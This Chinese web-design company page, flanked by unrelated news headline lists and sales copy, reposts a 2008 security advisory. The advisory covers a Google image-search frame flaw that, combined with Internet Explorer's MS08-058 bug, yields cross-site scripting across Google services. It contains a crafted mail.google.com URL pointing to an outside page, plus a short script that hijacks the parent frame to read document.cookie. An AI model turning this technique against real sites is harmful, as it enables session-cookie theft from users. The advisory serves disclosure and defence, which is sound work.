• 为什么火箭通常采用垂直发射? 2019-04-16
  • 阳泉首次颁布地方实体性法规 两部法规将于7月1日起实施 2019-04-11
  • 资本大佬甚至哀叹,进不了股市成了人生最大失败[木乃伊] 2019-04-07
  • 美国已经获得了,美国期望的金融开放,其他的美国已经不在乎了。本人早就断定,中美合作奢谈共赢。美国需要的是进入和控制中国,中国需要的是出口创汇。 2019-04-07
  • 足球界最丑十大球星:小罗第4!鲁尼第3 里贝里仅第6! ——凤凰网房产 2019-04-04
  • 委内瑞拉谴责加拿大对委政界人士追加制裁 2019-04-04
  • 漫步白桦林 感受夏的清凉与宁静 2019-04-04
  • 拉萨市城关区旅游市场表现活跃 2019-04-03
  • 汉阳陵举办“文化与自然遗产日”主题系列活动 2019-03-30
  • 2000多家国企医院年底前完成剥离 2019-03-30
  • 我国成功组织航天员沙漠野外生存训练 2019-03-29
  • 光明日报:保护教师教育学生的权利 2019-03-29
  • 【访民情 惠民生 聚民心】驻村路上父女同行 2019-03-26
  • 《辉煌中国》第四集:绿色家园 2019-03-26
  • 【学习时刻学思践悟十九大⑤】中央党校郑琦:八项规定仍是全面从严治党重要一环 2019-03-24
  • 深一集团40%的客户来自外地,80%的业务来自搜索引擎和良好口碑!
    微信 微信人工客服  |
    微信人工客服-直接沟通
    QQ在线沟通

    新闻中心

    全国业务咨询请致电

    400-666-2014

    为您打响品牌第一炮
    • 在线QQ
    • 在线客服
    • 在线留言
    跨站脚本漏洞,利用MS08-058攻击Google
    发布日期:2008-10-22   关键词:观兰网站建设★观兰网页设计◆观澜网站制作   已有 5171 人浏览
    国内安全组织80sec近日发现,Google提供的图片搜索服务存在安全问题,结合IE浏览器的MS08-058漏洞可以造成整站的跨站脚本漏洞,几乎可以控制所有的Google服务和获得目标用户的认证信息。

    漏洞说明:Google是全球最大的搜索引擎。同时Google拥有其他庞大的WEB应用程序产品线,涉及EMAIL、BLOG、在线文档、个人主页、电子地图、论坛、RSS等互联网几乎所有的应用业务。80sec发现Google提供的图片搜索服务存在安全问题,结合IE浏览器的MS08-058漏洞可以造成整站的跨站脚本漏洞,几乎可以控制所有的Google服务和获得目标用户的认证信息。

    漏洞站点://www.google.com

    漏洞解析:Google提供的图片搜索服务存在网页框架安全问题,恶意攻击者可以指定网页的内嵌框架页指向任意网页。该服务提供的URL地址主域名可以更改成Google的其他业务的子域名,从而造成严重的钓鱼网页攻击隐患。如下:黑客指定imgrefurl参数就可能构造GMAIL相关服务的钓鱼网页。

    //mail.google.com/imgres?imgurl=80sec&imgrefurl=//www.80sec.com&hl=com

    该漏洞结合由80SEC团队成员发现的IE浏览器的MS08-058部分漏洞可以造成GOOGLE整站的跨站脚本XSS漏洞,linx在《利用IE 框架跨域》文档分析了MS08-058涉及网页框架安全问题,子框架网页可以操作主框架的窗口句柄。这种类型的漏洞主要危害是不受IE浏览器同源策略的限制,可以跨域控制其他域的网页,影响所有的WEB应用。微软已经在08年10月提供了MS08-058补丁修复了该漏洞。

    测试代码:

    将Google的漏洞页指向MS08-058漏洞攻击页

    //mail.google.com/imgres?imgurl=80sec&imgrefurl=//www.80sec.com/MS08-058.htm&hl=com

    MS08-058.htm内容


    <script>
    setTimeout (
    function(){
    parent.location.href = new String("javascript:alert(document.cookie)");
    }
    ,1500);
    </script>

    即可获得GAMIL的Cookie信息

    危害提醒:

    黑客利用浏览器漏洞可以使这种类型的低风险Web安全漏洞扩大成影响所有Web应用的高风险安全问题,请各大网站及安全管理人员仔细分析评估MS08-058类型的Web安全问题。

    注:本文来自深一集团原创或转截 //www.a-iop.com/newslist_462_2.html 如需转载,请注明出处!
    1 2 3 4 5 6 7 8 9 10 11
    深一网络公司专注设计13年
    全国网站建设
    深一云服务器深一云服务器
    高性能,高安全
    网络公司拒绝不当利
    崇尚野蛮生长
    500强企业网500强企业网
    站建设供应商
    10000家客户案例10000家客户案
    实力说服力
    83位技术团队83位技术团队
    服务高保障
    深一只做有排名网站只做有排名
    有价值的网站
    200人服务团队200人服务团队
    追求客户满意
  • 为什么火箭通常采用垂直发射? 2019-04-16
  • 阳泉首次颁布地方实体性法规 两部法规将于7月1日起实施 2019-04-11
  • 资本大佬甚至哀叹,进不了股市成了人生最大失败[木乃伊] 2019-04-07
  • 美国已经获得了,美国期望的金融开放,其他的美国已经不在乎了。本人早就断定,中美合作奢谈共赢。美国需要的是进入和控制中国,中国需要的是出口创汇。 2019-04-07
  • 足球界最丑十大球星:小罗第4!鲁尼第3 里贝里仅第6! ——凤凰网房产 2019-04-04
  • 委内瑞拉谴责加拿大对委政界人士追加制裁 2019-04-04
  • 漫步白桦林 感受夏的清凉与宁静 2019-04-04
  • 拉萨市城关区旅游市场表现活跃 2019-04-03
  • 汉阳陵举办“文化与自然遗产日”主题系列活动 2019-03-30
  • 2000多家国企医院年底前完成剥离 2019-03-30
  • 我国成功组织航天员沙漠野外生存训练 2019-03-29
  • 光明日报:保护教师教育学生的权利 2019-03-29
  • 【访民情 惠民生 聚民心】驻村路上父女同行 2019-03-26
  • 《辉煌中国》第四集:绿色家园 2019-03-26
  • 【学习时刻学思践悟十九大⑤】中央党校郑琦:八项规定仍是全面从严治党重要一环 2019-03-24